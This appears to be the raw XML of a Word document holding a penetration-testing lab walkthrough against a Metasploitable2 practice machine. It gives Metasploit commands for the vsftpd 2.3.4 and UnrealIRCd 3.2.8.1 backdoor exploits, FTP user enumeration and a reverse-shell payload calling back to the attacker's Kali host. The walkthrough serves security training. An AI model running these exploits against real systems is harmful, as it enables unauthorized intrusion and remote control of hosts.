        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7590CF4D" w14:textId="14E68174" w:rsidR="00B06AF9" w:rsidRDefault="00B06AF9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On port 21 ftp service are enable for webservice, lets exploit it </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="120E0517" w14:textId="16F9B283" w:rsidR="00B06AF9" w:rsidRDefault="00B06AF9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Open </w:t>
      </w:r>
      <w:r w:rsidRPr="00B06AF9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>msfconsole</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="044217DF" w14:textId="2C6555D0" w:rsidR="00B06AF9" w:rsidRDefault="00B06AF9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And search  ftp with its version.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35F471F3" w14:textId="022ED489" w:rsidR="00B06AF9" w:rsidRDefault="00B06AF9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Command :- </w:t>
      </w:r>
      <w:r w:rsidRPr="00B06AF9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Search vsftpd 2.3.4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="599C3FB2" w14:textId="26C2A620" w:rsidR="00650D57" w:rsidRDefault="00650D5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We can use </w:t>
      </w:r>
      <w:r w:rsidRPr="00650D57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>auxiliary/scanner/ftp/ftp_login</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00650D57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0DF"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> to enumerate the user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="146BDF03" w14:textId="6EA0A153" w:rsidR="00650D57" w:rsidRDefault="00650D57">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2359E3EA" w14:textId="55DF4B04" w:rsidR="00650D57" w:rsidRDefault="00650D5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But let’s do exploit </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62342A6D" w14:textId="25740642" w:rsidR="00B06AF9" w:rsidRDefault="00AB277A" w:rsidP="00AB277A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highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB277A">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>U</w:t>
      </w:r>
      <w:r w:rsidR="00B06AF9" w:rsidRPr="00AB277A">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>se</w:t>
      </w:r>
      <w:r w:rsidRPr="00AB277A">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> exploit/unix/ftp/vsftpd_234_backdoor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15312EE6" w14:textId="72AADFB7" w:rsidR="00AB277A" w:rsidRDefault="00AB277A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000223F8">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Set rhosts [192.168.40.134]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20555F21" w14:textId="3AB0371F" w:rsidR="00AB277A" w:rsidRDefault="00AB277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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C46B327" w14:textId="1418D031" w:rsidR="00AB277A" w:rsidRDefault="00AB277A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13759E" wp14:editId="71EFB5A8">
            <wp:extent cx="5731510" cy="2510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73CF" w14:textId="77777777" w:rsidR="00AB277A" w:rsidRDefault="00AB277A" w:rsidP="00AB277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Run this exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16F7997B" w14:textId="20346EBA" w:rsidR="00AB277A" w:rsidRDefault="00191941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DA747B" wp14:editId="6782CE62">
            <wp:extent cx="5731510" cy="25253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A958" w14:textId="25D23984" w:rsidR="00191941" w:rsidRDefault="0019194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We can see here we got shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CF54BA2" w14:textId="1E508E24" w:rsidR="00191941" w:rsidRDefault="0019194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Lets run ifconfig command in this shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1369AACF" w14:textId="77777777" w:rsidR="006847E7" w:rsidRDefault="006847E7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71BBB983" w14:textId="5A94F904" w:rsidR="00191941" w:rsidRDefault="00191941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B94209" wp14:editId="502C9D22">
            <wp:extent cx="5731510" cy="2421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FC3A" w14:textId="50F3BD5A" w:rsidR="00191941" w:rsidRDefault="00191941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We can see IP of metasploitable2 machine </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31B3FB0A" w14:textId="26D84F35" w:rsidR="00191941" w:rsidRDefault="00191941">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53637494" w14:textId="1B5391E9" w:rsidR="006847E7" w:rsidRDefault="006847E7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2A84FA" wp14:editId="665D109F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6292" w14:textId="164E2DE0" w:rsidR="006847E7" w:rsidRDefault="006847E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This is telnet user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5042A7AA" w14:textId="2346AC8D" w:rsidR="006847E7" w:rsidRDefault="006847E7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We can login through telnet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69566082" w14:textId="1DEC4CB0" w:rsidR="006847E7" w:rsidRDefault="006847E7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B5B8B2" wp14:editId="7953CA3A">
            <wp:extent cx="5731510" cy="3224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35B7" w14:textId="00F6B746" w:rsidR="00CE5B55" w:rsidRDefault="00CE5B5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Lets exploit port 6667 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13E1998D" w14:textId="4B5F0950" w:rsidR="00CE5B55" w:rsidRDefault="00CE5B55">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE5B55">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="cyan"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>6667/tcp open  irc    UnrealIRCd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17F530A9" w14:textId="5537EC50" w:rsidR="00CE5B55" w:rsidRDefault="00CE5B55">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D719526" w14:textId="1E103917" w:rsidR="00CE5B55" w:rsidRDefault="00CE5B55">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE5B55">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Search UnrealIRCd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="416A93F5" w14:textId="4B000D35" w:rsidR="00CE5B55" w:rsidRDefault="00CE5B55">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE5B55">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Use exploit/unix/irc/unreal_ircd_3281_backdoor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EB1A8AD" w14:textId="63741319" w:rsidR="006C6F1A" w:rsidRDefault="00CE5B55">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C6F1A">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Set rhosts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FF1FADF" w14:textId="255BBA44" w:rsidR="00CE5B55" w:rsidRDefault="006C6F1A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8D0708" wp14:editId="7A58EFC9">
            <wp:extent cx="5731510" cy="2599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B55">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B058038" w14:textId="2D14C30E" w:rsidR="00A614F3" w:rsidRDefault="00A614F3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A23876F" w14:textId="700F94DF" w:rsidR="00A614F3" w:rsidRDefault="00A614F3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="477B60EB" w14:textId="77777777" w:rsidR="00A614F3" w:rsidRDefault="00A614F3" w:rsidP="00A614F3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A614F3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Set payload cmd/unix/reverse</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20CF3044" w14:textId="09A59AB3" w:rsidR="00A614F3" w:rsidRDefault="00A614F3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A614F3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Set lhost (kali ip)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EA21BD2" w14:textId="08D0C27D" w:rsidR="006C6F1A" w:rsidRDefault="00A614F3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23385" wp14:editId="4DB50D37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58B0" w14:textId="112C46FE" w:rsidR="006C6F1A" w:rsidRDefault="006C6F1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Run the exploit &lt;┙</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C1437E0" w14:textId="5EB07C04" w:rsidR="006C6F1A" w:rsidRDefault="006C6F1A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3392982B" w14:textId="1C9526E6" w:rsidR="006C6F1A" w:rsidRDefault="006C6F1A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We got the shell now we can run the command but </w:t>
      </w:r>
      <w:r w:rsidR="00A614F3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>let’s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> check IP by ifconfig</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A43CFBF" w14:textId="25102CF1" w:rsidR="006C6F1A" w:rsidRDefault="005B7522">
      <w:pPr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4EFF1E" wp14:editId="53E8CD13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E79F" w14:textId="45AB8FF5" w:rsidR="005B7522" w:rsidRDefault="005B7522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>We can see the server IP which is metasploitable2 machine IP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61BE79F3" w14:textId="77777777" w:rsidR="005B7522" w:rsidRPr="00215FE5" w:rsidRDefault="005B7522">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="005B7522" w:rsidRPr="00215FE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DC78D" w14:textId="77777777" w:rsidR="00731874" w:rsidRDefault="00731874" w:rsidP="00FA3E40">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="3061F85E" w14:textId="77777777" w:rsidR="00731874" w:rsidRDefault="00731874" w:rsidP="00FA3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8C52A" w14:textId="77777777" w:rsidR="00FA3E40" w:rsidRDefault="00FA3E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A9F54" w14:textId="77777777" w:rsidR="00FA3E40" w:rsidRPr="00567DE8" w:rsidRDefault="00FA3E40" w:rsidP="00FA3E40">
    <w:pPr>
      <w:pStyle w:val="Header"/>
      <w:jc w:val="right"/>
      <w:rPr>
        <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        <w:color w:val="7030A0"/>
        <w:lang w:val="en-US"/>
      </w:rPr>
    </w:pPr>
    <w:r w:rsidRPr="00567DE8">
      <w:rPr>
        <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        <w:color w:val="7030A0"/>
        <w:lang w:val="en-US"/>
      </w:rPr>
      <w:t>Md Asad Ansari</w:t>
    </w:r>
  </w:p>
  <w:p w14:paraId="06EF2C51" w14:textId="77777777" w:rsidR="00FA3E40" w:rsidRPr="00567DE8" w:rsidRDefault="00FA3E40" w:rsidP="00FA3E40">
    <w:pPr>
      <w:pStyle w:val="Header"/>
      <w:jc w:val="right"/>
      <w:rPr>
        <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        <w:color w:val="7030A0"/>
        <w:lang w:val="en-US"/>
      </w:rPr>
    </w:pPr>
    <w:r w:rsidRPr="00567DE8">
      <w:rPr>
        <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        <w:color w:val="7030A0"/>
        <w:lang w:val="en-US"/>
      </w:rPr>
      <w:t>Security analyst</w:t>
    </w:r>
  </w:p>
  <w:p w14:paraId="2083C7E4" w14:textId="77777777" w:rsidR="00FA3E40" w:rsidRPr="00567DE8" w:rsidRDefault="00FA3E40" w:rsidP="00FA3E40">
    <w:pPr>
      <w:pStyle w:val="Footer"/>
      <w:jc w:val="right"/>
      <w:rPr>
        <w:color w:val="7030A0"/>
      </w:rPr>
    </w:pPr>
    <w:r w:rsidRPr="00567DE8">
      <w:rPr>
        <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        <w:color w:val="7030A0"/>
        <w:lang w:val="en-US"/>
      </w:rPr>
      <w:t>asad@craw.in</w:t>
    </w:r>
  </w:p>
  <w:p w14:paraId="328B1ECB" w14:textId="77777777" w:rsidR="00FA3E40" w:rsidRDefault="00FA3E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625EC" w14:textId="77777777" w:rsidR="00FA3E40" w:rsidRDefault="00FA3E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35F3A" w14:textId="77777777" w:rsidR="00731874" w:rsidRDefault="00731874" w:rsidP="00FA3E40">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="02738C23" w14:textId="77777777" w:rsidR="00731874" w:rsidRDefault="00731874" w:rsidP="00FA3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BE5B0" w14:textId="77777777" w:rsidR="00FA3E40" w:rsidRDefault="00FA3E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5FED6" w14:textId="77777777" w:rsidR="00FA3E40" w:rsidRDefault="00FA3E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C9520" w14:textId="77777777" w:rsidR="00FA3E40" w:rsidRDefault="00FA3E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70B27"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FA901C22"/>
    <w:lvl w:ilvl="0" w:tplc="D1BA4EDE">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="-"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="510" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi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num w:numId="1" w16cid:durableId="2075933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64B"/>
    <w:rsid w:val="000223F8"/>
    <w:rsid w:val="000C292A"/>
    <w:rsid w:val="00124C83"/>
    <w:rsid w:val="001259DB"/>
    <w:rsid w:val="00182604"/>
    <w:rsid w:val="00191941"/>
    <w:rsid w:val="00194BAF"/>
    <w:rsid w:val="001A1293"/>
    <w:rsid w:val="00215FE5"/>
    <w:rsid w:val="00312194"/>
    <w:rsid w:val="0043309C"/>
    <w:rsid w:val="004E35BF"/>
    <w:rsid w:val="00510FB5"/>
    <w:rsid w:val="00540A5D"/>
    <w:rsid w:val="0058064B"/>
    <w:rsid w:val="005B7522"/>
    <w:rsid w:val="00646799"/>
    <w:rsid w:val="00650D57"/>
    <w:rsid w:val="006847E7"/>
    <w:rsid w:val="006C6F1A"/>
    <w:rsid w:val="00731874"/>
    <w:rsid w:val="00735715"/>
    <w:rsid w:val="00757921"/>
    <w:rsid w:val="007A44F1"/>
    <w:rsid w:val="00807073"/>
    <w:rsid w:val="008B2E01"/>
    <w:rsid w:val="008D427C"/>
    <w:rsid w:val="00936738"/>
    <w:rsid w:val="0099591B"/>
    <w:rsid w:val="009F2F39"/>
    <w:rsid w:val="00A614F3"/>
    <w:rsid w:val="00AB277A"/>
    <w:rsid w:val="00AF193A"/>
    <w:rsid w:val="00B06AF9"/>
    <w:rsid w:val="00B221D7"/>
    <w:rsid w:val="00C01F9E"/>
    <w:rsid w:val="00C752D8"/>
    <w:rsid w:val="00CC0528"/>
    <w:rsid w:val="00CE5B55"/>
    <w:rsid w:val="00D03977"/>
    <w:rsid w:val="00D05B1C"/>
    <w:rsid w:val="00D55054"/>
    <w:rsid w:val="00D60717"/>
    <w:rsid w:val="00DB7F69"/>
    <w:rsid w:val="00E203B2"/>
    <w:rsid w:val="00E363E8"/>
    <w:rsid w:val="00E672B1"/>
    <w:rsid w:val="00EB14B6"/>
    <w:rsid w:val="00F83CF8"/>
    <w:rsid w:val="00FA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09BEF"/>
  <w15:docId w15:val="{6A4EA530-92E5-4C2D-8275-DEB3E60EB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5F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FE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7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3E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E40"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00FA3E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ulnhub.com/entry/metasploitable-2,29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10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Asad Ansari</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Md Asad Ansari</cp:lastModifiedBy>
  <cp:revision>8</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-05-15T07:17:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-07-23T06:08:00Z</dcterms:modified>
</cp:coreProperties>
</file>